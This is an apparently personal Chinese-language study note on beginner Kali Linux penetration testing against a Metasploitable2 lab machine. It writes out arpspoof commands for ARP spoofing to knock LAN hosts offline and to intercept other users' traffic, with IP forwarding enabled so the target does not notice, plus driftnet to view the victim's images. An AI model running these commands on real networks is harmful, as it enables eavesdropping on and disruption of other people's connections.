kali linux渗透入门(1)

对渗透感兴趣，这些天研究了一下kali，搞了个课程，在VM上搭建了个靶机：

https://sourceforge.mirrorservice.org/m/me/metasploitable/Metasploitable2/ 

对于kali的安装不做过多陈述，网上很多教程，以下把我学习到的笔记记录，更新中。

1 sqlmap sql注入 ，没啥好说，id=1测试，注入，基本行不通

2.arps 欺骗攻击，使得内网主机断网

(1)先查看网卡是多少: ifconfig

(2) arps攻击:

--arpspoof -i eth0  -t XXX(目标IP) -r XXX(网关) 可以使断网

3. arpspoof 截取内网其他用户的流量

(1)先开启内网转发，不让目标容易察觉出问题:

cat /proc/sys/net/ipv4/ip

echo 1 >/proc/sys/net/ipv4/ip_forward

(2)然后攻击，先将目标流量转移网关

--arpspoof -i eth0  -t XXX(目标IP) XXX(网关)    

--arpspoof -i eth0 -t XXX(网关) XXX (自身IP)

(3)截取目标主机的流量，例如查看他再看的图片

driftnet -i eth0